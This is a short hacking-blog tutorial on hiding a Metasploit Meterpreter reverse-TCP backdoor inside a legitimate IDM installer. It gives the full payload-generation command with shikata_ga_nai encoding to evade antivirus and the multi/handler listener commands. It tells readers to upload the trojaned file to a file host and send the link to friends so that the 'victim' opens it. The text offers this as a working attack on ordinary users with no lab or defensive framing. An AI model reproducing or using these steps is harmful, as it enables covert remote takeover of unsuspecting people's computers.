Welcome back Hackers!
We have embed a Backdoor in to a PDF file,Android package File.
In this tutorial we will embed a Backdoor in to an exe file.
lets start,
Open msfconsole
To create the embed exe we need the executable file.I am using idm to create the Backdoor.
Lets create the Backdoor,
1.We will use shikataganai to encode the Backdoor
msfpayload windows/meterpreter/reversetcp LHOST=192.168.186.128 LPORT=443 R | msfencode-e x86/shikataganai -t exe -x /root/idman.exe -o /root/Backdoor.exe
2.Upload the file to Speedyshare
3.Share the Link with your Friends
4.Now we can set up a listener
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reversetcp
PAYLOAD => windows/meterpreter/reversetcp
msf exploit(handler) > set LHOST 192.168.186.128
LHOST => 192.168.186.128
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
* Started reverse handler on 192.168.1.101:443
* Starting the payload handler...
when the victim open the File we will get the meterpreter prompt
As you can see we got the meterpreter prompt.
The backdoor do not need any Vulnerability.Works on all patched and unpatched systems,only thing Want to evade the antivirus.
keep coming!
Thank You!
sudharsan..
Comments
No Comments Exist
Be the first, drop a comment!